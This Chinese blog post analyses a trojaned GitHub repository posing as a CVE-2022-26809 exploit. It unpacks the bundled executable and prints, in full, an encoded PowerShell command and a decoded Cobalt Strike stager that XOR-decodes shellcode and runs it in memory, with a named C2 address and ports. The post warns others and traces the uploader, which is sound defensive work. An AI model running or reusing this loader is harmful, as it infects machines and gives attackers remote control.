github水坑小记

May 27, 2022

刚刚打开github,映入眼帘就是XXX starred rkxxz/CVE-2022-26809 (本次目标,有马勿下)

上个绵羊墙

心里想法,卧槽这个有工具大杀器呀,看看看... 进来就封装了个成品exe,突觉事情不妙.打开我的 die,ida,dnspy,记事本,010editer,就是一顿输出.

样本分析小记

1.查询目标基本信息确定使用工具

这不是号称拉入即源码的C#嘛,搞他

2.dnspy拉入确定混淆状态与加壳

ConfuserEx 确定默认加壳信息

混淆代码中找到Assembly.LoadModule进行断点,将数组保存出来.就可以得到内存解密后的代码.

解密后代码_字符串未被处理de4dot搞他

搞完状态,powershell 一看就是cs.没啥欲望.不过本着水字也是水的态度.搞
"powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLAFYAVwArADIALwBpAFMAQgBMACsAZQBmAGcAcgB2AEYARwBrAEQAVQBxAEMAdwBSAEIAQwBNAGwAcABwADIAZwBhAEQAQwBXACsARABlAFUAVABSAHkAWQArADIAYQBXAGcALwA0AG0ANQBqAG4ATgBuADUAMwA2ADgATQBoAEYAdABtADcAdgBhAGsATwB5AFQATAA3AHEATABxAHEALwBxAHEAcQA3AHQASwB4AC8AeABlADUAegBHAHgAZQBUADkAMABzAEgAQgB2ADQASgBpAFIATQBCAEMAawBRAHUARwA2AEcAVwBwAGMAKwBFAFAANAA5AG4AdgBoADIAbQBRAE0AKwB4AGIATgA4AHUAVgBWADQAVQB2AEMAUwBPAEEASgBlAHMAWQA0ADkAcgA5AGUATABrAHUAVABKAE8ARABFAHgAeQBVAHQANABEAGcATwBJAHgAMwBIAE8AMgBKAGoAQgBtAHEAQgA2AFcATQBXAG0AVABZAFcAUwBMAEQAQgBOAGgAZQArAEYANwA1ADgAaQBSAEsATABFAGwAdQB3AEsAYgBnAFEAMwBDAFMAdwBEADkASQB2AHIAeQBvADEAUABmAFkAbQBuAFAANwBHAFEAZQBJAEwAaQBOAEwAUQBOAGoAbQBFAE4AOAAwAGkATABIAHcAWABsAE4ARAAzAFMAUgA1AGkAZQBWADgAcABsADgAdAAzAHcAZwBRAHoAYwBJAGMAUABFAGcAawBrAHcAbwAvAC8AaABOAFgASABmAGgAaABuAG8AegBqAGsARQBFAGgATwArAEwAdgBRADIAbQBNADcANABYAGkAQwBUAFcAYwBlAEUAMwA1AEUAcQBmADAATgB4AGgAUgBvAEMAcwA5AEMAUQBnAEsAZwBJAG0AaQBCAFMANABKAFAATQAvAFgAMABPAHgAawAzAEsAZABYADgASwBJAHoANQB6AGQAVQBXAHgAdwBHAG0AVgBhAG4AawBVAEgAcABWAFAAQQBNAHkARABzAFEAQQBkAHcAOQBKAEMAdwBDAEwAagAzAGcAcwBHAEMAVABtAGkAVQBrAFAAdgBHADkATwBNAGgAbwBoAHgANABrAHgAWQAzAGQASAB4ADAANgBxAGsAdwA5ADgAVwByAGoAMABNAGsAZABuADgAWQBsAG8AOABlAHYALwBFADQANABTAFkANQBQAGoANgBSAHAAZQB6AHIALwBDAE8AYQA0AFIAaAB5AEsAeQBJAEgAMQAvAGkAWQB1AGIAOQB2AFkAWQAzAEYAawBaAFoARABFAC8ARQB6AGkATABSADIAWQBNAHQAUQBHACsAegBzAFkASABYADgARABpAGsAUABhAC8AYQBCADYAOQBhAGMANwAvAHkAQwBRAEgAbgA1AHUARQBxADIARwBzAFEAOAAxAFMAUABMAFQAeQBTAHYAeABrAHMAKwA2AFkAZwBVAE0AaAA0AE0AUABXAE8AbQBtAGYAVQBFAG8AWQB0AHMAUABBAFkAUQBlAFAAcwBKADAALwBDAGwAZgBmADQASABEAFkAbwBSADgAUgBpAG0AUABZADcAZwBGAE8ANwA0ADgANABRAHAALwBZAGMAYwBoAEMAbAA1AGMAVQBmAFcAMwBHADAAZQBtAGwAdwBOAG0AQwBMAGQAZwBSAEIAOABlAEYANgB5AGgAbgB5AHkANABOAFQANABjAG4AVgAyAHkARwArAGYAdQBJAGYAdgA0ADQAWgA0AGgAOQAyAHAAYwBtADIATQBVAHgARABtAHoAcwBvAE8AUABwAEoASgBpAFYASQBMAGMAVABNAC8ARAB3AHoAYgBlAGIAcQB4AE4AbQBuAG8AOAA3ADQAWABYAEUAagBxADcAZQBTAGkAZgAxAHIATgBRADcAbABVAHEAeABlAEEAWgB0ADQAdwBEAEgAcwBNAHQAYQBjAEQAdwBoAEUATwBYADEATgBFADUAdwA0AFIAcQAyAEwASwBIADUAWQBUAHQAVAAvAHcAegB1AEUAMAArAE4AUQAxADgAUABrADkAagBHAE4AeQBlADQATwArAEYAOABjAHgAUQBMAGgAVgBjADUANAAvAGoAMQA3AGUAMQA2AFoAOABiAC8AcwBQAFAAcgA1AGcALwBoADkAVQB3ADgAMgBPAEcAWQB2AHoAMAAvADUAeQBpAHkAeQBYAEMAOQBsAHQAOQBMAGcAWABkAHoASgBRADUASgBGADgARgB2AHEAUQBXADAANwAzAFMAMwBwAEsASwBsADgAUABUAGgAbQBaAEcAcQBGAGoAWQBmAG4AWgBmAHUAcABpAFAAMgBiAFkAVwBOADIAbQBvAEQAawBkAFIATAA3AGMAWQBBADIAUwA1AHAAcQBOADAARgA2AEkAMQBKAFcAVwBzAGcAUgArAG0ATgBPADAAUgBOAE8ANQBNAFgANQBNAGcAZwA4ADUAYQBrADQAbgBuAEkARwBXADEARwBMAGIAOAAzADAASgBoAGMATwBlAEUAYwA3AGUAMQBhAHIAYgBNAG8AbwAyAHEAMQBOAHEAeQBXAHQAdwA3AHUANQB2AHAAYgA1AEEAeAA4AGsAdQA1ADcAOABHADAAagBaADkAaQBUAHcAYQA2AHMAMABWAFoAWABtAFYAaAB6AFMAVgAzAE4AYQBVAGUAcwBxAFcAdAAzAEgAagBLADkAWABsAHMANQBaAHYAdQBCAE8AawBnAE8ASABZAGsAbQBwAGoARQBKAHAAeAAzAGIAbAAwAFgAUgA2AEwAdABQAEMANgBQAGkATABBAHoASgBxAHgAdQBCAEgANABoAFAAaQAyAGkAZABFADEAWABaAFAAagBQAFUAaQBlAGsATgBKAHIATQA1AHgASgBjAGkATgBLAHYASQBvAFYASAB6ADMAZgAxAE8ATgBPAHAAVgAyAFkASQA4ADYAQwBaAEMAeQBsAEsAYgA2AEQAUABhAG4AYwA2AG8ASABOAFkAcgBzADIAUQBJAHUATQBRADIAbQAyAGsARgA3AFUAWABBAE4AbgBkAFAAVQA4AFAAMwB1AEwAeABlAFAANABwAFAAYwB6AFYARgB0ADYAMAAwAGIAUwBIAFUANwBJAGgAcgBkADEAVwBXAHQAZQBDAGgAbgB0AEwAdwBuAFMAMwBJAHcAcwAxAHQAMQBYAEMAaQBxADcAagB2AEgAdQBNAHoAUABXAGQAaQBBAEQAYQB2AHUASgA0AEMAMgBMAHMAVQA3AFMARABDAGgAMwAxAFYAcgA0AEoATwB0AEIAMABEADEAagBEAG8AbwBqAEYAQwBkAFcAMABuAGkAbQBKAGoAMQB3ADkAVwBxAHAAVwBpAGUAUwBXAHcAZQBHADgAMAAvADYAagBNAEQAWgBGAHkAWgA1AHIAUgBiAFAAWgBFAEgAOQBMAHAAZABxADMAcQAyAGwAagBSAHMAcgBZAGYANgBZAGEANABVAFYAWQB2ADQAaABZAE4AZQB0AG0AYQB5AFMAdQByADIAZAAxAFkAeQAyADUARgBUADYAVgA5AFoARwBVAHYAVABPAE8AOQBUAGEAZQAvAFQANQA1AGUATgBHAGMANgBNAC8AVABxAHUAegBSAEQAKwAxAEcAbABpADEAVABqAFkANwBYAFEAKwBIAGoAdQBVAEMAcwBZADEANwBWAFcAWgBZAGQAOQB5AHEAeAAyAGEAegBmAFEAYQA2AG0AbQByAEQAZQBXAFYARQBtAFgAaQAwAG0AMAA5AFAAZAAwAG0ATQBtAEQAVwBaAG0AcQBXAG4ATwBiADkASgB2AE0ATQAyAEEALwBWAHUAMgBuAHEAcAAzAEoAUQAwAE4AQgBVAG0ALwBUAGUAdABSAFUASgA3AEkAMgB5AHoATABvADEAZwBhAGIATQBhAHcAbgBtAFQAbQBmADUAUABnAEgAVABKAEEAUABaADAAMABrAHYAWQB6AEwATAA2AGoAWAByAFQAZQA2ADYANgBtADAAcwB0AFUAMgBTAFYAbABMAHEANQBtAEsAcwArAHcANwB6AFgAVABTAHEASAA5AHMASAArAEwAMwBSAEUAeQAwAHMAYgAyAHMAagAyADcATABjADYAVQA5AFUAZABMAGUAVQAvAHYAMgBrAFQASAB4AGYAUgBPAG4AWQBXAE0AMABKAFIAVwB1AE4AQwBvAGYAWgB0AGEAUABzADIARwBVAFEAZgB4ADgAVQBKAE8ATgBCADgAZgBSADAAdwAwAFcAMQArAEgAYwBXAGUALwBvAGMAcQA3AFgAeQA0ADgAZABhADcAQQB4AG8AbgBGAGEAOQBXAGQASgB5AHoAQwB3ADEAOQBiAFUAYwBqAE8AaQB3ADgAWQBIADUAVgA2ADkAVQArADMARwBmAFUAdAB1AFAAaQA2AGoANQByAHcAVwBKAFoAVgBwAHQAbQBwAHUAcABGAEcATAA2AFcANwA2AHUASwBoAHoAdgAvAEcAaAB0AE4AegBoAGIARgBnAGYASQBwAG4ARQBWAFQAeQBMAHoATwBYAEEAYQBlAGwAZABhAHgAagBQAHAAcwBGADIATQBHAHgASwBMACsANQAwAHoARQBSAHoAdAB0AHIAVQAyADUAMQBiAGEANwBoAGYAOQA2AHMAagAyAFkANABVAHgAWQArAGEAVQBrAGMAZABhAHAAcgBJAFIARQBlAHgAMQBjAGoAYgBxAHEAUgBSAGMALwBsAFQAVgBaAFAAbgBkAFUAbQBTAHQANgB1ADQAQgAzAFgAZQA2AE0AMgBKAEEAWABWAHEAYgB1AFUAUQB5AFYAQQB0AGIAUQA4AGgASwBCAE4ARABXAGkAOABqAGQAVQBTAGgARABxAGYASgBPAEMAOQAwAEoARQB1AEcATwBpAFUAWQA2AGgAUQBoAFUASgBMAHoAVwB0AFYAcABHAEoAQgBEAHIAWABhAG0AawBGAFoAYgBUAG0AcwBMADUARwBCAGoAbQBkADYAUwBTAEgAUgBGAHMAVAAvAGQAWgByAEIAWABhAFcAKwBqADUAZQA5ADkAMwB6AHQAZwBvAFMAdQA0AFkANgA2AHQAeABIAFUAUAB0AC8ATAByAGMAYwBnAG8ANQBUAE0ARgBYAEMAcwBYAHYAUgBSAEcAaABmAE0AbABWAE8AcgBoAHcATwBOAHIANABWAGEAbwAzAEYAMABZADMAVgA3ADIAVQBzAEQANABIAEMALwB1AEkAVgAvAC8AUgBmAFUANABtAHYAdwBFACsAUABQAFEAQQBYAG8ALwBEAHgAMwBGAEEAbgBHAEYAbQAxAGMANQBEAE8AbgBiAGIAeQBjAHkAUgBaAGcAdQBDAGwAKwB1AFAAUgBwAGEASgBuADAAKwAzADgAUABWAHIAeQBDAE4ATQBVACsAZwByAHgAVgArAEYARgA3AC8AZgB2ADQAcQA5AGMAMgBZAHIAVQAxADYAaQBDADMASwBiAHMANwA4ADcANABRADgARwAwAGQAUAB2ADYAYQBsAFcASABnADkAOQBzAFkAMwA0AFoAbwBmAGUAdQArAHYAcQBiADIAWQBDADgAcQBYAGUATQBkAGwAKwBaAEwAVwBFAGEAaQBZAFQAMwBxAC8AcwBIAHEAOABaAEgAVgBxAE8AOQBLAHYAWAB2ADkAZABHAHoAOABoAC8ANQBUADIAdgBKAG0ARAB3AGUAZQBBAFYAaQB6ADgARABnADEAYwB5ACsATQA1AFUAWAB0ACsAWgBqAEMAbQBDAFAAZgA0AFgAVwBnAGMAbwBtAEwANQBtAEgASwAvAEMAUwAzAEkALwBLAEcAVAAzAFYAeQBiAFIAVQBGAHIATABhAEMAZgBDAFQAKwBFAGUAOABnAHgAWQBsAFYASgB1AEUAZQB4AGwALwBnAFkAaABvAHIAagBzAFAAeQBuAGsARQBKAFUAQgA4AE0ALwBZAFIAaQAxAE0AZABuAGgAKwAyADUAbwBBAFIARgBNAEcAYwA2AGgARAB5AEMANQBNAHMAagArAEMAUwBHAHIAagAvADEAOQBDAHcAQQBBACIAKQApADsASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAJABzACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsA"

先将powershell的base64进行解密.获得真实代码.

$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("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"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();

得到被混淆的代码.将末尾iex修改为输出.获得解密后的代码.

Set-StrictMode -Version 2

$DoIt = @'
function func_get_proc_address {
	Param ($var_module, $var_procedure)		
	$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNat
iveMethods')
	$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
	return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')
).Invoke($null, @($var_module)))), $var_procedure))
}

function func_get_delegate_type {
	Param (
		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
		[Parameter(Position = 1)] [Type] $var_return_type = [Void]
	)

	$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicMod
ule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
	$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
	$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')

	return $var_type_builder.CreateType()
}

[Byte[]]$var_code = [System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFq
C9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2yyMjIyMS3HR0dHR0Sxl1WoTc9sqHIyMjeBLqcnJJIHJyS5giIyNwc0t0qrzl3PZzyq8jIyN4EvFxSyMR46dxcXFwcXNLyHYNGNz2quWg4HNLoxAjI6rDSSdzSTx1S1ZlvaXc9nwS3H
R0SdxwdUsOJTtY3Pam4yyn6SIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FYke3PKWNzc3BLcyrIiIyPK6iIjI8tM3NzcDE1PbxUjZsGkA2y+V6dgrLuDpAsuxyvT6DK3J4T0Xd+IxTlyJY+jLbhSYyUXIkeFcXUWma6J2VOZu0K
KA3bvRJENbaPULOvVjwbJsV8SuyN2UEZRDmJERk1XGQNuTFlKT09CDBYNEwMLQExOU0JXSkFPRhgDbnBqZgMaDRMYA3RKTUdMVFADbXcDFQ0SGAN3UUpHRk1XDBYNExgDYWxqZhoYZm12cG5wZgouKSMyMhYt070XA6NzikIDAbZTl0ziQ348PHeLVd968kqx4FcTFBxub/tL
43eqWIg9gaJsyG5oMRFOL6u8T421PexllkfRbokssfK1YK/0XvD8b+kRKUF89EpaimKWBZJD6vBt7fEtgihgcnjjvrZc4PYi6hsxHXxLAewGicbXPMUIDjd5WXrJhVUeuVbuUmtN6pqlvpSG5lFd6jOc9wgYIaaXH4Fvf/MAKwsaL2Ws6Q8Wr9OdftR1vx/rbjIN4aOJwcm9X
Kj/FTJUM9YETDAAFF2eCK0jS9OWgXXc9kljSyMzIyNLIyNjI3RLe4dwxtz2sJojIyMjIvpycKrEdEsjAyMjcHVLMbWqwdz2puNX5agkIuCm41bGe+DLqt7c3BcWDRIaFA0SEBENFBEjIyMBsw==')

for ($x = 0; $x -lt $var_code.Count; $x++) {
	$var_code[$x] = $var_code[$x] -bxor 35
}

$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntP
tr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)

$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
'@

If ([IntPtr]::size -eq 8) {
	start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
	IEX $DoIt
}

搞过渗透的基本上很容易看出来CS默认的powershell生成模板.只需要处理base64之后异或0x23即可得到原始shellcode.

原始shellcode

得到C2服务器信息 45.197.132[.]72 样本分析工作至此告一段落.

溯源分析小计

1. 针对C2服务器IP进行关联

域名关联信息太久远,无法确定真实关联程度

fofa,quke皆为发现历史扫描信息.无法确定资产历史情况.怀疑可能是新资产.打开goby扫描端口看看有没有脆弱资产(当然啦,多半没啥用.不过可以帮助我们有效确定攻击服务器状态).与此同时,我们针对github上传信息进行溯源确认.

创建者ID:rkxxz 创建者提交记录添加.patch查看提交日志
比较狡猾,使用了github默认邮箱
4月19创立的账户
今天发表了两个库,都是基本相同带木马的
20223为关联端口,8899为上线端口

由于发现太早,还未在各大论坛发现该作者推送信息.预测下一波可能会到各大论坛对存储库进行推广.等待事件后续进展.

BambooQJ

向你推荐

未找到文章

当前没有文章, 请稍后再看.